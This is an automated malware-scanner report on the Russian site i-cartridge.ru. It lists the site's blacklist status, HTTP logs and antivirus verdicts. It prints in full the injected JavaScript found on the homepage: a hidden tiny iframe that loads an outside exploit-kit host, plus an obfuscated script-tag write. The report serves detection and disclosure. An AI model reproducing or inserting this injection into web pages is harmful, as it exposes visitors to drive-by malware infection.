Malware Scanner report for i-cartridge.ru

Malicious/Suspicious/Total urls checked: 1/0/3

1 page has malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "i-cartridge.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=i-cartridge.ru

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://i-cartridge.ru/	200 OK Content-Length: 3333 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) (function(){ var a = document.createElement('iframe'); a.src = 'http://zymase.org/index.php?r=9bb1291'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; a.style.width = '2px'; a.style.left = '1px'; a.style.top = '1px'; if(!document.getElementById('mira')) { document.write('<div id=\'mira\'></div>'); document.getElementById('mira').appendChild(a); }})(); document.write("<scr"+"ipt src='/foxyroxy.js'><"+"/script>"); Antivirus reports: AntiVir JS/iFrame.WJ Avast JS:Iframe-AHU [Trj] Ad-Aware JS:Trojan.Script.AAL nProtect JS:Trojan.Script.AAL TrendMicro-HouseCall JS_BLACOLE.SMJF Emsisoft JS:Trojan.Script.AAL (B) McAfee-GW-Edition JS/Exploit-Blacole.ko TrendMicro JS_BLACOLE.SMJF Microsoft Trojan:JS/BlacoleRef.CL Kaspersky Trojan.JS.Iframe.adm MicroWorld-eScan JS:Trojan.Script.AAL Fortinet JS/Redir.BBEQ!tr McAfee JS/Exploit-Blacole.ko NANO-Antivirus Trojan.Script.Iframe.bcslpm F-Secure JS:Trojan.Script.AAL F-Prot JS/IFrame.RS.gen AVG HTML/Framer Norman Iframe.SL GData JS:Trojan.Script.AAL Commtouch JS/IFrame.RS.gen BitDefender JS:Trojan.Script.AAL
http://statforme.dynalias.net/googlestat.php	500 timeout Content-Length: 30 Content-Type: text/plain	clean
http://statforme.dynalias.net/test404page.js	500 timeout Content-Length: 30 Content-Type: text/plain	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: i-cartridge.ru

Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0
Connection: close
Date: Sat, 27 Dec 2014 03:14:16 GMT
Accept-Ranges: bytes
ETag: "2708ee2a-d05-4f49dc7255cc0"
Server: Apache
Vary: Accept-Encoding
Content-Length: 3333
Content-Type: text/html; charset=windows-1251
Expires: Sat, 27 Dec 2014 03:14:16 GMT
Last-Modified: Sat, 15 Mar 2014 04:39:55 GMT

...3333 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: i-cartridge.ru
Referer: http://www.google.com/search?q=i-cartridge.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for i-cartridge.ru

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools